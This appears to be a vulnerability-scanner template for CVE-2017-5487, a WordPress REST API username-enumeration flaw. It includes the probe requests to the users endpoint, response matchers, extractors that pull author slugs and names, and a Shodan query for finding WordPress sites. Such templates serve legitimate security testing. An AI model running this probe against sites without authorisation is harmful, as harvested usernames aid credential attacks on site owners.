id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik,dr0pd34d severity: medium description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. reference: - https://www.exploit-db.com/exploits/41497 - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.wordfence.com/blog/2016/12/wordfence-blocks-username-harvesting-via-new-rest-api-wp-4-7/ - https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2017-5487 cwe-id: CWE-200 metadata: shodan-query: http.component:"WordPress" verified: "true" tags: cve,cve2017,wordpress,wp requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/users/" - "{{BaseURL}}/?rest_route=/wp/v2/users/" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - '"id":' - '"name":' - '"avatar_urls":' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 extractors: - type: json part: body name: "usernames" json: - '.[] | .slug' - '.[].name'